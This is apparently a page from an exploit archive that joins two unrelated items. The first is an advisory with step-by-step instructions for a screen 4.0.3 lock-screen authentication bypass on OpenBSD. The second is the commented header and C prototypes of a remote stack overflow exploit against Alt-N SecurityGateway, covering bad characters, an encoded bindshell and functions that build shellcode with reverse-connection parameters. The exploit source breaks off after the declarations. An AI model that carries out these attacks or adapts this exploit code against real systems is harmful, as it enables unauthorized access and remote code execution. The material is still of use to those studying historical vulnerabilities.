screen 4.0.3 loacal Authentication Bypass

Author: Rembrandt
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.

Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.

All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.

Alt-N SecurityGateway v1.00-1.01

* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtain the overflow and crash the application is peace a cake job.
* To make a wroking code execution here is a hell. First we can see that
* the username before overflow the buffer pass through some functions,
* that changes and restrict some useful chars. Firstly the beffer gets
* lowered so the overflow should not contain upper chars :( . So i decided
* to use some encoders for the payload like nonupper and non alpha from MSF.
* The nonupper use the `@` (0x40) char which the app doesn't eat at all.
* The nonalpha encoder in decoder code and the generated body contained
* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1,
* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
* After few days of work i have comed with the required bindshell which bypass
* all restricted chars and executes. Thx to skylined, for his alpha tool.
* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
* 0xC1 0xC2 0x80 0x81
* ----------------------------------------
* Thanks to:
* 1. securfrog ( )
* 2. ALPHA 2: Zero-tolerance ( )
* 3. The Metasploit project ( http://metasploit.com )
* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/

#include
#include
#include
#include
#include

#pragma comment(lib,"ws2_32")


void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);